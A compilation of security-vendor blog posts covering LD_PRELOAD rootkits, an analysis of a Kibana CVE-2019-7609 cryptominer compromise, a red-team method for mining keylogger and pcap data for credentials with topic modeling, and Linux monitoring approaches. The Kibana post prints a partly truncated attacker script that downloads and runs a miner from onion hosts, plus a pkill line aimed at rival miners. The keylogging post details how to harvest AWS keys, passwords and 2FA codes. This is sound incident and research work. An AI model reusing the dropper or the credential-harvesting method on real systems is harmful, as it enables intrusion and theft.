LD_PRELOAD Backdoors

LD_PRELOAD allows overriding functions that would normally be loaded dynamically with user-provided alternatives. Essentially a module that is preloaded can hook a dynamically-loaded function (e.g., one from libc), and specify a function that should be called in its place. This latter function can perform a series of actions before calling the original function or skip it overall. Such hooks are very practical and are mainly used for debugging (e.g., faking clock time to achieve deterministic builds and tests) but can also be used to implement security features. Naturally, the mechanism has been abused by malware, to effectively backdoor applications. Rootkits such as Azazel or bdvl demonstrate how such hooks can be used to bypass authentication mechanisms or to open connections to remote services.


In this post, we outlined common techniques used by attackers to gain persistence in an execution environment. Although several of these techniques can be thwarted by modern runtime checkers and malware analysis frameworks, a recurring theme emerges: functionality that involves state and dynamic loading or unloading of code can be used both for good and evil, and the pool for new attack vectors is endless. 

Thus, it is critical not only to analyze software for such vulnerabilities, but to also built robust dynamic detection and prevention frameworks that do not only rely on known exploitation patterns, but can provide runtime assurances that user-defined security properties are not violated. Our goal at Capsule8 is provide the protection and visibility needed to ensure Linux production systems aren’t pwned, without slowing down performance or inadvertently creating new backdoor opportunities (we don’t use a kernel module for, well, all the above reasons). 

1 Originally, the term rootkit was coined to denote a collection of tools that enabled administrator-level access to a computer or network” (think utilities like sed and ps). Today the term is almost exclusively referring to malware. In this post, we will use the term rootkit to denote any malicious program that achieves persistence, whether in kernel-space or userspace. Return^

2 You may check the settings in your system by examining the CONFIG_RANDOMIZE_BASE and CONFIG_RANDOMIZE_MEMORY in your kernel config. Return^

The Curious Case of a Kibana Compromise

Posted by

The sun rose, coffee was guzzled, and fingers clicked away at keys, making it a typical day at Capsule8 HQ – until it wasn’t. As the Capsule8 team deployed one of our toy target instances (one with exploitable software on it for demo purposes), we noticed alerts firing from components which weren’t part of our normal demo. 

With a penchant for the paranoid (many of us are former black hats, after all), our suspicions flared at this irregularity. Was there exploitable software on this instance beyond that which we pre-installed? Indeed, dear reader, there was.

Here’s what happened

While deploying a cluster of cloud instances full of exploitable software, one of our sales engineers noticed something peculiar, and chimed in on Slack about what might be a potential bug. The deployed instances are part of an environment designed to be a hacking playground where customers and prospects can frolic and observe our detection capabilities (without having to host or attack their own vulnerable infrastructure). This means they are intentionally vulnerable to a variety of command injection, memory corruption, and privilege escalation vulnerabilities. 

We discovered an oddity — an alert arising from a part of the cluster we bolted on to visualize output, not a part of the software “goats” we ritually sacrifice to the demo gods to showcase our wares. No one likes the thought of bugs in their work, so our researchers were quick to jump in and analyze the source of the seemingly spurious alert. We discovered that this was no misfire, but instead an unanticipated (though eagerly welcome) spooky guest deploying their own “surprise administration” capabilities against our Kibana instance. We had real ghouls joining us in our holodeck horror house — Casper the Friendly Ghost this was not.

After analysis, we identified that the bug being popped was an RCE vulnerability in Kibana (CVE-2019-7609), the exploit for which was published on GitHub on October 21st, just two days prior to our detection in the wild within our laissez-faire hackzone. It’s almost 2020, and it brings us a nostalgic tear of joy to know that to this day, the kids still aren’t wasting any time to “productionize” new “tooling”. But as with many attacks against modern infrastructure these days, the attackers were using their newly acquired access for cryptomining.1 They could have stolen our digital soul, but settled for truffling out full-size Snickers bars for their treat pail. We immediately saw an attacker getting an interactive shell from Kibana, downloading a new executable, and running it (self high-five for that detection win). When going through our alert data, we quickly noticed there were program arguments that were base64 blobs. Looking deeper into attacker behavior, we saw that the base64-encoded data in program arguments was being passed to the base64 command in order to decode it. Attackers often base64-all-the-things to reduce the likelihood of something being escaped incorrectly and failing execution. Attackers like reliability so they can receive more treats than tricks.

The alert excerpt above is from the Capsule8 console, showing the contents and process lineage of the base64 payload being dropped.

Below is the post-base64 decoded script in full, which we will walk through to discuss the operations of this payload:

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
x() {
x=/kb.$(uname -m)											
z=./$(date|md5sum|cut -f1 -d" ")									
dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)						
for i in . $dir /tmp /var/tmp /dev/shm /usr/bin;do touch $i/asdf && cd $i && rm -f asdf && break;done	

wget -t1 -T180 -qU- --no-check-certificate $1$x -O$z || curl -m180 -fsSLkA- $1$x -o$z	
chmod +x $z;$z;rm -f $z										
for h in
if ! ls /proc/$(cat /tmp/.X11-unix/01)/io; then						
x torntpcxcymuceev.$h										

Let’s look through the script line by line:

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

The first couple of lines shown above redirect all output to /dev/null and set a new PATH environment variable. Most of the script lives within the function x(), which will be called multiple times below.

x() {
x=/kb.$(uname -m)

The first meaningful behavior of this payload is to get the machine architecture. On our nodes, -m returns x86_64.

z=./$(date|md5sum|cut -f1 -d" ")

Here, the attacker is creating a random-looking filename for the Bitcoin mining executable they are about to drop onto the system. While the random file name might stick out like a sore thumb, it makes it harder for other people breaking onto the same box to find and kill this Bitcoin miner (an understandable threat for this attacker to bear in mind, as you will see below).

dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)

In this line, the attacker is saving the home directory of the running user.

for i in . $dir /tmp /var/tmp /dev/shm /usr/bin;do touch $i/asdf && cd $i && rm -f asdf && break;done

The above loop is looking for places where the attacker has write access. They’re looping through common directories (including the home directory it just found), changing into each directory, then trying to write a file in it. If it’s successful, they delete the file and exit the loop,  with the current working directory being one in which they know they can write.

wget -t1 -T180 -qU- --no-check-certificate $1$x -O$z || curl -m180 -fsSLkA- $1$x -o$z

This wget command downloads the miner. It uses a lot of options, including single attempt, 180s timeout, ignore insecure TLS certificates, outputting to the filename determined above, quiet mode, and no User Agent. The rest of this line means it also tries the curl command if wget fails, with more-or-less the same options..  Whether using wget or curl, the downloaded miner outputs to the same filename generated above.

$1 is the URL to pull from.

chmod +x $z;$z;rm -f $z										

The above line makes the miner file (the name of which is stored in $z) executable, runs it, and deletes the executable. The executable is deleted as a proactive cleanup step by the attacker.  

Below this point, we’re outside the function x(). The rest just loops through onion domains to try to pull the payload, and passes the domain to the function x().

for h in
if ! ls /proc/$(cat /tmp/.X11-unix/01)/io; then

This check seems to look for a pid value in the file /tmp/.X11-unix/01, presumably added by the attacker to record the pid of the running backdoor. This choice of this directory name, .X11-unix, is probably intended appear benign to users running Linux on the desktop. If the pid referenced in that file exists, this script doesn’t run the x() function but instead breaks out of the loop.

x torntpcxcymuceev.$h

The above line actually runs x(), passing in torntpcxcymuceev.<oniondomain>.


We still haven’t reverse engineered the cryptocurrency miner yet, but we were able to quickly ascertain what it was doing by using our investigative capabilities, running SQL queries against data that we streamed to S3 using AWS Athena. The two primary things we saw from our query were an attempt to install software on the box (in this case wget, which failed), and an attempt to kill all other cryptominers that might be running on this host:

pkill -9 -f ./cron|8220|aecc2ec|aegis_|AliHids|AliYunDun|aliyun-service|azipl||cronds|currn|curn|crun|cryptonight|ddgs|dhcleint|Donald|fs-manager|finJG|havegeds|hashfish|hwlh3wlh44lh|HT8s|gf128mul|Jonason|java-c|kerberods|khugepageds|kintegrityds|kpsmouseds|kthrotlds|kw0|kworkerds|kworkre|kwroker|mewrs|miner||muhsti|mygit|networkservice|orgfs|pastebin|qW3xT|qwefdas|sleep|stratum|sustes|sustse|sysguard|sysupdate|systeamd|SzdXM|t00ls|thisxxs||/tmp/ddgs|/tmp/java|/tmp/udevs|/tmp/|...

They kept trying to kill other cryptominers on a 10 minute interval, giving off major serial killer vibes. Think of pkill like their digital chainsaw and the attacker as Leatherface trying to kill off all the Jason Voorheeses and Freddy Kruegers in their territory.


Unfortunately for the attacker, they never managed to mine any coin (another win for the Ghostbusters!). Another cluster was popped fairly soon after the cluster we investigated was first compromised (within a day). Only two of the demo clusters we had open (at least a dozen that are unrelated other than running in AWS) got popped. 

We can confidently say that there’s at least one attacker running around trying to find and compromise unpatched Kibana servers. Unfortunately, we didn’t have our investigations capability collecting data in that cluster at first. We turned it on and then restarted our agent to see if the attacker persisted, but the cryptominer didn’t persist and the attacker never came back to that cluster.

The fact that the attacker we saw wasn’t competent enough to do anything useful is honestly a positive. There wasn’t even an attempt to escalate privilege, which is kind of lame on their part — like a ghost who just lurks in shadowed corners to steal leftover change rather than having the guts to scare a human to death and seize the mansion for eternal haunting. In light of this, this was most likely some script kiddies taking advantage of the fact that a public exploit for CVE-2019-7609 was (fairly quietly) dropped.

However, because the bug was so easy to exploit, anyone more sophisticated could have landed this exploit and stayed resident on the system without much worry of being detected. Very few people would have noticed, unless the attacker was doing something ostentatious — like mining for Bitcoin, which eats CPU and drives up cost on any public cloud instance.

But here’s what matters

Of course, a software bug being exploited in the wild is a tale as old as time, like the haunting of a decaying, elegant home on top of a hill. Our case serves as only one of many examples of a known vulnerability becoming a public exploit. Attackers, wanting economies of scale, apply the automation and wormification treatment to maximize the breadth of compromise. This is a tactic even among script kiddies, the most basic of attackers. That is to say, our story is not groundbreaking, or hype-worthy, and we certainly won’t register a domain with custom branding just for it.

When prospects come to us, they’ll often tell us they know they’ve been hacked because their cloud bill went up, and when they investigated, they found cryptomining activity. But they never have any idea how the attacker dropped their cryptominer onto the system, which makes it challenging to assess the damage and make sure it’s contained. Yes, bad things can happen, but you don’t have to panic – you just need to have visibility to know what’s going on so you can handle it efficiently, without leading to organizational disruption.

1. We discovered this by running the script through VirusTotal, showing it clearly was a denizen of Minertown (a figurative city in said boring cyber dystopia). Further investigation showed that the post-exploitation activities line up with similar miners.

The Capsule8 Labs team conducts offensive and defensive research to understand the threat landscape for modern infrastructure and to continuously improve Capsule8’s attack coverage.

Major Key Alert: Data Discovery for Red Teams with an ML Tool for Keylogging

Posted by

With the glut of security vendors who promise to secure to the moon and back on the star-glazed spaceship of Machine Learning (ML) technology, where is the equivalent for red teams? Imagine a scene: an earnest red teamer hunched at their desk, hand under chin, eyes hazy with fatigue as their finger presses the down arrow for what seems like eternity, sifting through irrelevant search history, Word document creation, and Slack messages between colleagues who also enjoy dogs and house-hunting and other trivial things, all to find the treasure they so tenaciously hunt — the user’s credentials.

Keyloggers are an essential tool for red teams, covertly capturing keystrokes by users to discover secrets that help further the goal of pwnage — with the keyboard output created by credential entry being one of the most valuable plums to pluck from the system. Gaining credentials through keylogging can assist with lateral movement or accessing valuable data — so it can be worthwhile for red teams to sit and wait for hours to days for a user to input their password within a veritable ocean of unimportant keystrokes.

For those of you who are ATT&CK Framework fanatics, keylogging corresponds to the “Input Capture” technique, part of the Collection and Credential Access tactics. As you can see under MITRE’s “Examples” section, basically every notable malware / RAT family (like DarkHotel, Duqu, and PoisonIvy) uses a keylogger, as do notorious APTs like APT3 (China), APT28 (Russia), and the Lazarus Group (North Korea).

Capsule8 is built by former black hats to help teams operating Linux production systems ruin other black hats’ fun, so we can empathize with the pain red teams face when having to sift through a mountain of junk data just to find the one credential they need. Leveraging the brilliance of our lead data scientist, Harini Kannan, we’ll demonstrate how to use topic modeling (a natural language processing (NLP) technique) to help downtrodden red teamers more quickly complete their quest of grabbing credentials out of their keystroke or system data dumps.

Topic Modeling 101

First, what is topic modeling? Topic modeling is a text-mining tool using the magic of statistics to uncover abstract concepts that appear in a set of textual data sources (usually documents). The model ingests text data, automatically tries to learn the context (called “topics”), defines the topics, and then splits the dataset into subsets of words based on the identified topics. You can think of a topic as just a repeating pattern of words in a corpus (a collection of texts), and each corpus can be described by a pattern of topics. As a result, topic modeling is a great way to organize, search, and filter text data. 

While there are a number of topic models out there, we used latent Dirichlet allocation (LDA) for this project. LDA is most commonly used for things like clustering similar news articles together or analyzing Shakespeare for themes, but it can be used for any sort of textual data. Although they don’t state it explicitly, Google very likely uses LDA (or a similar model) to enhance search functionality through what they call the “Topic Layer.” The goal of LDA is to map documents to topics and topics to words to help us more quickly understand what is present in the source material.

Efficient keylogging analysis may not be the first use case that comes to mind, but the ability to map disparate log files to topics and topics to words — like passwords — is a decidedly useful endeavor towards that devious ambition.

Setting up the Model

First, we install gensim, a Python library for topic modeling, and nltk, which helps us perform NLP with Python. We also need to install pyLDAvis, a Python library for interactive topic model visualization, and import all other necessary libraries (like pandas and matplotlib). Once all the dependencies are installed, we upload our dataset (if we aren’t running the model locally). 

Cleaning up the dataset

We need to clean up the dataset to transform it from a messy trash pile into a streamlined trash pile — the data pre-processing step. To begin pre-processing our data, we remove stop words, which are extremely common words with little value — think “and”, “in”, or “the” in English. Since system logs don’t really follow English grammar rules (Stannis would be so upset), we added stop words specific to systems, too. For example, stop words for TCP data would include “com”, “request”, and “response”.

Our pre-processing also includes the creation of bigrams and trigrams, as well as data lemmatization. Text that is read two words at a time is a “bigram”; text read three words at a time is a “trigram.” A bigram of a sentence would be: “I pet”, “pet a”, “a fluffy”, “fluffy cat”. A trigram of the same sentence would be: “I pet a”, “pet a fluffy”, “a fluffy cat”. Bigrams and trigrams facilitate our model’s understanding of sentences (or strings), and help it figure out the context around words. Using this understanding, the model can begin predicting subsequent words — think of how Google autocompletes queries for you based on what you’ve typed into the search bar thus far.

Lemmatization seeks to find the base of words (called the “lemma”) and removes inflectional endings. For instance, lemmatization removes the “ing” from “walking,” outputting the lemma of “walk.” Importantly, lemmatization can understand context, understanding that “hearing” can be either a verb or a noun, and only outputting the lemma “hear” when it is a verb. Lemmatizing data is an important step in pre-processing so that all forms of a word are treated the same.

Training the model

To train the model, we first need to compute the coherence score on this pre-processed data. The coherence score measures the relative distance between words within a topic — think of it like a measure of word similarity. Each topic gets its own coherence score. From these multiple scores, we select the model with the highest coherence scores — because the highest score implies a more distinct topic, and distinct topics expedite data spelunking. This model then guides us to the optimal number of topics, ensuring that each topic is sufficiently distinct but relevant.

Topic learning by the model

Once we’ve chosen our optimal model, we can extract the dominant topics. For instance, dominant topics from an article about Linux might include distributions, system calls, or vulnerabilities. Each of these topics would have distinct keywords, such as “Debian,” “Ubuntu,” or “Red Hat” for the distributions topic. These keywords can be visualized through a word cloud, with the size of the keyword reflecting its weightage within the topic. We’ll show you examples of these topic word clouds in our case studies below.

With these defined topics and keywords, we now can plainly see where the appropriate breadcrumb trail begins and begin intelligently searching within a particular topic. It’s like if Gretel and Hansel could apply a topic model to the magical forest and directly explore Topic 0: Candy. 

Now that we understand topic models and how to set them up, let’s walk through the three use cases we created at Capsule8 — finding AWS keys in keylogging data, passwords in a TCP pcaps, and passwords in HDD logs. If you are impatient, intrigued, overconfident, or all of the above, you can dive right into looking at our model by looking at the Google Colab doc

Case Study 1: AWS Keys in Keylogger Data

This is where the fun begins! We knew our problem — how to pick out credentials from keylogging data — and our statistical model (LDA), but we didn’t have any keylogging data with which to play. The Capsule8 Labs team offered up their machines to the Elder Research Gods in tribute, so we had multiple users run execsnoop for approximately one day to generate data. In the process, one or more of our colleagues may have “accidentally” spilled their credentials while doing their work on those machines.

We could’ve cheated and used their daily work profile to help us with the analysis, but we wanted to mimic real attackers who are attempting to analyze keylogging data of their victims who aren’t sitting next to them in the open office everyday. Again, the goal is to figure out if any sensitive information leaked, and if so, to figure out those data points from the execsnoop log. Importantly, we must do so without manually combing through the data set — the (super lame) status quo.

Before even touching simple search tools like grep, we want to filter and partition the dataset to gain a sense of where to start within this sea of data. Luckily, the topic model helps us reduce the time to fish out our target data by a lot. Our optimal model had five topics, which is digestible for most humans:

Let’s explore these topics with their respective top keywords (and the weights of those keywords) to see how we can assign categories for each topic.

Topic 0: Folders and source control

Topic 1: Docker-related activity

Topic 2: “Cloud Stuff” (it’s a technical term, promise)

Topic 3: Capsule8 build & GO-related

Topic 4: C-related

Based on the optimal topics identified by the model, we can now determine which topic holds to most potential as a grove of succulent leaked credentials ripe for plucking. Topic 2, aka “Cloud Stuff,” logically seems like it would contain login and configuration commands for various cloud services. Let’s take a look at the list of top 30 words within the topic below to see if any interesting keywords jump out:

(note: the graphic above says “Topic 3” because its numbering begins at 1, rather than 0 as the model uses)

As you can see, the intriguing keyword “aws” is second on this list, which gives us our first breadcrumb. With any luck, these users performed actions like configuring AWS credentials, making the keyword a solid starting point for hunting leaked credentials — particularly if users didn’t follow best practices during the configuration steps, which is regrettably common. 

Within Topic 2, the “aws” keyword has three data points we can investigate, which means the model identified “aws” as the primary keyword in three instances. It’s important to focus just on the relevant keywords for a specific topic, as there can be instances of the same keyword within other topics that are irrelevant (and are deemed as such by the model). For instance, there are 773 data points for “aws” within Topic 3, but it’s because “aws” appears in a URL path related to build commands, which isn’t relevant for our purposes.

Let’s take a look at these three data points for “aws” in Topic 2 to see if there’s anything that could help us:

Fantastically for us, the user made a heckin’ DevOops by using the wrong command, which leaked their AWS key. Now that we have their AWS access key, we could perform any actions we want in their AWS account (that are allowed by policy). We could use the key to launch EC2 instances for cryptomining or to access and exfiltrate sensitive customer data stored in S3 buckets — both of which represent a pretty big win for attackers. 

By using the power of topic models, we were able to quickly able to narrow down places to hunt based on relevant instances of the “aws” keyword. In fact, we didn’t even know we wanted the “aws” keyword (instead of a keyword like “password”) before we saw the topic the model generated — so it granted us a path previously unknown to us. This process helped us get to our goal in less than 30 minutes, rather than conducting an exhaustive manual search across the thousands of “aws” mentions within the entire dataset.

Case Study 2: Passwords in Captured TCP Traffic

Passwords are even harder for most red teams to discover as they sift through keylogs or syslogs, but using an LDA model helps with password discovery, too. Passwords could end up in a number of places or utilities, so they may be spread around multiple topics. For instance, on Linux, password input could occur frequently when using MySQL (mysql -u root -password), though passwords could also be pasted into bash by accident, too.

In the dataset from our first case study, any mistakenly pasted password into bash would be present in Topic 0 (Folders & Source control). If we want the mysql password, we would want to find the mysql keyword somewhere in one of the topics (which we didn’t have in our dataset). Thus, any red team’s starting point should be, “What topics are relevant for password leakage?” This helps you drill down into the right data, whether you’re seeking AWS keys or MySQL passwords.

To show the potency of the topic modeling approach, we will re-apply the LDA model to TCP dumps. We are operating as if we do not already know what the log contains, but have the mission to discover any passwords or credentials that could abet our malicious machinations. To test this out, we downloaded pcaps from the Mid-Atlantic CCDC, a competition testing students’ offense and defense skills. To our knowledge, all passwords and other information present in the data are not sensitive.

Let’s yeet ourselves right into the topic word clouds. The model found the number of optimal topics to be ten:

Topic 0 seems to be the most relevant to us, containing content related to login and authentication:

We can see the keyword “password” present in the top 30 list for Topic 0, so let’s dig deeper to see if we can find any passwords. As before, this is as simple as looking for a string containing pass within the topic:

We found them! They’re pretty simple passwords, probably because it’s for a student competition. However, whittling down 17 separate pcap files into topics for exploration and searching for the pass string within that topic saves a lot of manual effort rather than having to search through each file and hit matches for pass that may have the wrong context. Really, what is a valuable tool but something that facilitates laziness without reducing success?

Case Study 3: Passwords in a Windows HDD

We at Capsule8 enjoy a proper challenge, so we wanted to make the password discovery problem even harder for ourselves. For this final case study, let’s assume we gain direct access to our target’s hard drive, running Windows. We find a subdirectory that contains log files (an admittedly small sample of the entire dataset). Our goal now is to find passwords within it. As discussed in the two previous case studies, we’ll start by building an LDA model that learns the optimal number of topics, analyzing the topic clusters, and then seeing if any topics discernibly divulge the presence of passwords.

The model found five topics to be the optimal number. Because we used a real data set (i.e. a real, wild-caught HDD), we will only show the two topics relevant to our interests and with some sensitive keywords obfuscated:

The word cloud in Topic 3 exposes the keyword “password,” so we know the best starting point for our search. In fact, the model uncovered 162 passwords within Topic 3, which should make any attacker salivate: 

“Excelsior!” we cry out in furious joy, for we now hold the golden keys to paradise, where attackers can drape themselves on velvet chaises while languidly munching plump grapes by making the machines do all the thinky-thinky. But our brow furrows, imposter syndrome descending like a dark shroud, and the spark of ambition flares anew, curiosity pricking our neurons and leading to the harrowing question, “But what if there’s more?”

Looking back at the word clouds above, Topic 0 also looks promising with beguiling keywords such as “verification”, “verify”, “account”, and “code”. My initial instincts were that this might contain 2FA codes, and my hunch was correct:

Note: we only are displaying a snippet of these 2FA codes for a popular chat app — there were 3,655 codes in Topic 0 uncovered by our model.

HDDs contain a ton of data — far more than is manageable for an analyst to comb through in a day. Using topic models, you can extract context from a huge volume of disparate data and divide it into manageable subsets for further analysis. In this last case study, these subsets included password information as well as verification codes — and this represents only a tiny fragment of the data on the HDD.


Using a bit of data magic, attackers can sift through large quantities of data to determine specific topics, identify promising keywords in those topics, and then analyze those keywords’ data points to see if juicy treasure lies within. Topic models help point you in the right direction to hunt for leaked credentials. And, the best part is that topic models only get better as the dataset increases in size, which makes it a lot easier (and hopefully more fun!) for attackers to find the data they need to advance their operations.

It would be natural and reasonable to think that perhaps we’ve overengineered this problem and that we are using fancy math for fancy math’s sake. Well, yes, but also no. Grepping is undeniably efficient if you already know what you seek and where to look for it. A key advantage topic models have over just grepping is they will tell you about topics about which you weren’t aware — which means you would never know to search for it without the model’s guidance. 

Model training took just under 30 minutes for the first case study and only 15 minutes for the last one, but it could take more time with a larger dataset (like many days worth of daily system activity across many users). However, that represents a significant improvement over the amount of time it currently takes attackers to sift through keylogging data for the data they need. Let the model do the hard work of sifting through the data mountains to find the gilded path that leads to the cave of wonders within.

To explore our topic modeling tool yourself, check out our public Google Colab doc.

The Capsule8 Labs team conducts offense and defense research to understand the threat landscape for modern infrastructure and to continuously improve Capsule8’s attack coverage. 

How Capsule8 Approaches Linux Monitoring

Posted by

We at Capsule8 have put a lot of thought into our product by thinking about what would make us most mad as hackers if we encountered it while attacking an organization.

One difference between Capsule8 and other Linux detection solutions is that our detection happens locally. It’s far less expensive for everyone to do computations locally vs. sending off the machine via the network, and we like avoiding unnecessary pain. We also make Capsule8’s resource cost tunable, so you can set how much CPU time goes towards Capsule8 doing its thing. 

How you configure Capsule8 depends on your risk tolerance and your preference. This is how we’ve gotten the thumbs up from Ops, even at large enterprises. But what’s extra cool about Capsule8 is that we use kprobes + perf in an intelligent way, driven by our extensive experience breaking into systems. 

Think of it like this: if you want to know whether someone broke into your apartment, there are a few strategies you could create. The most obvious ones would be catching the window breaking, the doors being bashed in, or the safe with the jewels opening. This is where our exploitation expertise comes in handy (more on that below) because we look at what attackers must do to complete an attack. 

We maintain multiple vantage points, with an eye to the attacker’s “kill chain” — like looking at the front door, window, stairs, and closet door to the safe. You could also create a policy like: normally you hear the front door open before the window opens, so if you hear the window open before the front door, that’s weird. Think of this as the “check the context around the window opening” strategy.

Most ML, AI, and other mathematically-magical solutions are more like: “Let’s spend some time counting all the times the doors opened, and then send alerts on anything that deviates from this baseline we established.” Some go to an extreme and perform analysis that sounds cool, akin to asking, “Are the bricks moving? We should analyze the atomic states of the bricks in the building, maybe we should look at the chemical composition of the glass, too.”

For too many of these ML and AI-based solutions, they not only ignore how attackers actually behave, but also end up wasting a lot of network traffic and compute time. No one wants their time wasted, and the organization certainly doesn’t want its resources wasted.

At Capsule8, we also want to make attackers sad — hopefully crushing their souls. Ideally, you want to pinpoint exactly which points are interesting to attackers in the kernel and watch those closely. This is where a deep bench of exploitation experience (like our Capsule8 Labs team) comes in handy. That way, you know which places in the kernel are most loved by attackers, and can collect data that matters rather than collecting all the things.

For example, attackers love popping shells. But developers and programs love using bash or bin shells, too — it’s just a handy tool that everything uses. Most solutions will create a rule like, “show me anytime a shell runs,” which is going to be all the time. 

This sort of rule becomes functionally useless unless you absolutely love sifting through the same alert over and over. Capsule8 instead can determine the difference between a user or a program using it, and answer questions like, “Is this shell executing to routinely process a script, or is it interacting with a live user?” 

Capsule8’s approach means we can detect the entire spectrum of unwanted behavior on Linux, from devs risking production stability to sexy kernel exploitation by motivated attackers. This includes real zero-days — not zero-days as in “a slightly modified malware strain,” but the top-shelf expensive stuff that is exploiting the system in a way you can’t patch. 

If you want a cool recent example, check out our recent case study in detecting a compromise (specifically, a cryptominer) in our demo Kibana infrastructure. We also recommend checking out our Part 1 and Part 2 of how we exploited systemd (the first public exploit, I might add). The best part is, our stack pivot detection catches it — and that’s just one of the many detections we have in place. So it’s not about finding CVEs or anomalous behavior, it’s about finding the exact techniques attackers must use to compromise the system.

If you’re interested in learning more about how Capsule8 can protect your enterprise Linux infrastructure, request a demo.

A Guide to Linux Monitoring

Posted by

Different Approaches to Linux Host Monitoring

In case you hadn’t heard, Linux is a big deal. Linux servers are used in the vast majority of production systems, the ones running the apps and services everyone uses. But, as said by the great infosec #thoughtleader and uncle to Spiderman, “with great power comes great responsibility.” These servers need to be performant all the time — downtime isn’t considered cool these days.

Most organizations aren’t yet fully resilient, so a compromised system might even mean having to pull systems out and swap in new ones. And, there’s the annoying risk of bitcoin miners wanting your delicious computing power that vastly exceeds the systems in their basements.

You might think, “Well, we can just monitor Linux production servers and detect the attackers!” and basically everyone wishes it were that easy. This is not the case, however (at least in this Earth’s timeline). The most common approaches to monitoring Linux add components that cause chaos — kind of like adding dinosaurs to a theme park on an otherwise wild and beautiful tropical island. It may sound cool, but it’s likely to end poorly for everyone, except the dinosaurs — or in this case, the solution vendors who will gladly chomp up your dollars.

I’ll go through some of the approaches to monitoring Linux for production systems in a way that is digestible for folks learning about Linux monitoring for the first time and hopefully still fun for Linux nerds, too. Disclaimer: a lot of things will be really simplified, since the Linux Kernel is kind of like a pocket full of spaghetti with an extra heaping of nuance sauce required.

I’ll discuss any reservations DevOps has about the different monitoring approach (hint: there is scar tissue around this topic for them) and general pros and cons of each method. We’ll go through a brief primer on the Linux kernel, then dive into AuditD, kernel modules, LD_PRELOAD, kprobes, ring buffers, perf, BPF/eBPF, and the role of ML/AI to explore the amazing world of Linux monitoring — and conclude with what kind of monitoring approach will get the thumbs up from both DevOps and SecOps.

The Linux Kernel

The kernel is like a super detailed gatekeeper. Similar to a bank teller, any program has to ask the kernel (teller) to do something on its behalf. Really the only thing for which a program doesn’t need the kernel’s assistance is arithmetic or raw computation — but use of hardware, like a graphics card, or other resources, like /etc/shadow (which stores password hashes), must be facilitated by the kernel.

Syscalls represent the point by which you transition into the kernel. Think of these like the window at the bank under which you slide your request to the banker teller — you have to wait for a response to that request before anything happens. Syscalls can be requests from opening a file to giving the program more memory. Generally a more privileged entity — like the kernel — is the one that provides those things.

Some requests, however, will be a bit trickier, so the response won’t be immediate. Think of this like asking your bank teller, “Hey, can you give me a new bank account?” Your bank teller responds that they’ll have to collect a bunch of stuff to give to you. Likewise, for some requests, the kernel will tell the program to wait because it has to give it a bunch of stuff.

Thus, syscalls become an interesting point for inspection, because they are showing all the requests programs are making to the kernel. Basically every approach to Linux monitoring is either looking at syscalls or at other internal kernel functions for this reason — because you get better insight into the internal workings of the system.


AuditD is a subsystem of the Linux kernel designed for monitoring access on Linux, writing as much audit info as possible to disk. All you probably need to know is that a core maintainer for syscall infrastructure on Linux hates AuditD and recommends staying away from it. But, here’s a very short explanation on why it’s so hated by the Ops community anyway.

The root cause of the issue is that AuditD conforms to a government standard that all events have to be auditable. So, you can’t have the ring buffer (more on that below) dropping anything — think of this like you can’t have any events leaking out of the information pipeline. In practice, this means that the whole system blocks processing until it’s confirmed that an auditable event was consumed. In some modes, this results in instability.

Another concerning issue is that AuditD’s log output is notoriously difficult to use and work into other systems. Unless you’re optimizing for the worst performance possible, this isn’t how to go about security observation on Linux.


Although it’s not frequently used, LD_PRELOAD is a way to monitor Linux while staying in userspace. The loader manages libraries — think of things like libc or pthread in Linux which programs use to do stuff. This means with LD_PRELOAD, you can leverage any sort of library you want and make sure it runs before the main program is loaded.

LD_PRELOAD says before the program starts, load all my code in there as a library. This approach provides a way of placing hooks inside the program without having a debugger attached — similar to the approach EMET uses on Windows. The thinking here is, “Okay, program, I know you go through these points to talk to the kernel, so I’ll set my hooks from the inside so I can see what you’re doing.”

As far as stability concerns, if your hooking function isn’t well behaved, then you’ll crash the program. The program expects memory and registers to be returned in a certain way, so if your hook doesn’t meet those expectations, the program will panic. In practice, most of the time you normally know the calling convention of the functions you want to hook with LD_PRELOAD, so it’s usually a safe thing to do and pretty fast, making it less of a risk than something like AuditD.

Another downside of LD_PRELOAD is that the visibility you get isn’t global and is instead process to process — because you can only see the processes you’ve hooked. As you try to make it more global, it becomes more fragile. This is because of variations in library versions result in different symbols to be exported — that is, it’ll export data or instructions into a different space in memory between each version. Finally, it doesn’t work with statically compiled binaries; static binaries don’t load other libraries, so you can’t preload your own library in them.

If you’re an attacker and clued into the fact that LD_PRELOAD is being used, you’ll be motivated to make the extra (but not difficult) effort to evade monitoring by performing syscalls directly. Even for programs linked to a particular library (like libc), it’s still possible to perform the syscall instruction (x86_64) or int 0x80 instruction (x86) directly. A preload-based monitor would completely miss events like those, and the last thing security people want is a big oof by missing easily-performed bypass maneuvers.

Kernel Modules

The original approach to monitoring activity on Linux was through kernel modules. With a kernel module, you add some code to the kernel that executes as part of the kernel and becomes as powerful as the rest of the it — allowing you to do things like see all the syscalls coming in, plus any other capabilities you might want.

If this doesn’t sound safe, it’s because it isn’t! By adding code to the kernel, you’re adding attack surface that isn’t nearly as reviewed and tested as the base Linux kernel itself (which already has plenty of bugs on its own). Forcing custom C code into the kernel creates more code for attackers to exploit, although there are serious concerns beyond security for kernel modules as well. There are some workarounds, such as through Dynamic Kernel Module Support, but it requires recompiling — thereby requiring a compiler to be in production, which isn’t great ops hygiene.

If there were a Master Wizard of Linux gracing us with their sagely commandments, one would probably be “don’t break userland.” This means you shouldn’t change how all the programs on the system are written to talk to the kernel. While kernel maintainers adhere to this commandment to preserve outward-facing behavior of the kernel, the kernel itself thrives in a state of chaos all the time, so whatever kernel module you write risks not melding into the chaos and may instead cause a catastrophy. The kernel module is like a drama queen joining a carefully orchestrated fight scene — the likelihood that someone is going to get hurt shoots up.

Most Ops people understand the risks involved with using kernel modules, which engenders wariness. After all, the last thing you want is to crash the kernel on a production system — the likelihood of which can increase dramatically if a third-party kernel module is present. Ops teams also won’t be super jazzed at the fact that adding a kernel module often invalidates support contracts with their providers, like Red Hat. Think about it like jailbreaking your iPhone and getting Apple technical support.

Even worse, a kernel module means that every time a new kernel is deployed and updated, you have to recompile the kernel with the module. This adds manual labor and a layer of complexity that is a huge turn off for Ops teams. Ultimately, the risk tends to outweigh the reward with kernel modules.

Kprobe Events

